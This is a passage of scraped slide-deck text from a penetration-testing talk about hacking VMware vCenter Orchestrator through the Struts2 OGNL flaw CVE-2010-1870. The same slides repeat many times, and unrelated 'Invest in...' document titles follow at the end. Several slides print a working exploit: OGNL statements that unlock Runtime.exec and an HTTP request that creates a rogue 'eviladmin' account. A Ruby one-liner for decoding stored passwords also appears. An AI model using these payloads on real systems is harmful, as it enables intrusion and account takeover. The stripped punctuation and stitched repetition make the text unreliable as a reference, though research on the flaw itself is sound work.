bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 23: Invest in security

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 24: Invest in security

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 25: Invest in security

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 26: Invest in security

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 27: Invest in security

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 28: Invest in security

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 29: Invest in security

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 30: Invest in security

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 31: Invest in security

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 32: Invest in security

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you

Invest in Kazakhstan.ppt

Invest in security to secure investments - SecTor 2018 in security to secure investments SAP Security Landscape. How to protect (Hack) your (Their) big business. Alexander Polyakov

INVEST IN The business park TRIS KANIŽARICA. INVEST IN

Invest in Missouri Sponsors. Invest in Missouri

Invest in Success

Security Compensation - How to Invest in Start-Up Security

Et samarbeidsprosjekt mellom: Invest in Invest in Norway Why investing in Norway and what Invest in Norway can do for you

Why You Need To Invest In Security Vehicles

Why dry areas should invest massively in innovation to ensure food security

WHY INVEST IN SECURITY? · increase overall resilience against terrorist attacks. In this time of unparallel security climate, the business community needs to be on guard. As the

INVESTING IN WOMEN & GIRLS · 2020-01-06 · WHY INVEST IN WOMEN + WASH? :: WHY INVEST IN WOMEN + WASH :: WHY INVEST IN WOMEN + WASH :: WHY INVEST IN WOMEN + WASH . Non-profit dedicated

Invest in security · Invest in security to secure investments SSRF VS. BUSINESS-CRITICAL APPLICATIONS PART 2: NEW VECTORS AND CONNECT-BACK ATTACKS Alexander Polyakov –CTO at ERPScan

5 Signs You Should Invest in Security

Invest in laos

INVEST IN INNLANDET PRESENTASJON AV FORPROSJEKTET 26-27. juni/Invest in... · PRESENTASJON AV FORPROSJEKTET. Invest in Innlandet The Green Olympic region, Norway Invest in Innlandet

Why Invest In · Why Invest In Stainless Steel Bollards? Bollards are a crucial component for the deterrence of vehicle traffic in areas with enhanced security requirements. By choosing

Invest in Confidence Invest in Confidence1005_BC_UserGuide_AN_web.pdfInvest in Confidence Invest in Confidence A104/05 AUSTRALIA FCX australia [email protected] roWVIlle,

Invest in Illinois · Invest in Illinois is a collection of programs offered by the Treasurer’s Office - (1) Ag Invest, (2) Business Invest and (3) Community Invest - that provide

Invest In Durango

Why dry areas should invest masively in innovation to ensure food security

Invest in ME Newsletter June 2017investinmeresearch.org/Documents/Newsletters/Invest in ME Resear… · Invest in ME Newsletter June 2017 Author: Invest in ME Research Subject: Newsletter

Invest in Dubai's Future. Invest in Your Future

invest in - ::: BKPM - Japan International … 26th 2017 invest in Invest in remarkable indonesia Invest in indonesia remarkable indonesia Invest in remarkable indonesia Invest in

Some Essential Reasons To Invest In A High Security Door Lock

Invest in Confidence Invest in Confidence - Bernard Controlsbernardcontrols.pro/pdf/304,1005_BC_UserGuide_AN_web.pdf · invest in confidence. Expertise and Innovation Expertise is

Invest in security to secure investments

Invest in KAZAKHSTAN

Invest in serbia_august_2010

Инвестируй - Invest in Võru | Invest In Võru - Invest in Võru€¦ · находится Центр киберзащиты НАТО, а также ИТ-агентство

Invest in and Manage the Cybersecurity · 2018. 6. 23. · DARKReading #4 Valuable Security Certifications for 2017 CyberSecurity Portal, #5 Best Security Certifications for 2017

Invest in Pittsburgh

10 REASONS TO INVEST IN SA › sites › default › files › gcis_documents › 10...10 REASONS TO INVEST IN SA a physical security of property standard, and a right to transfer

Invest in philippines

Invest in security to secure investments · About ERPScan • The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP • Leader by the number of acknowledgements

Value of Investing in Information Security · Problem Description Is it beneficial for small companies to invest in good information security? The thesis should attempt to provide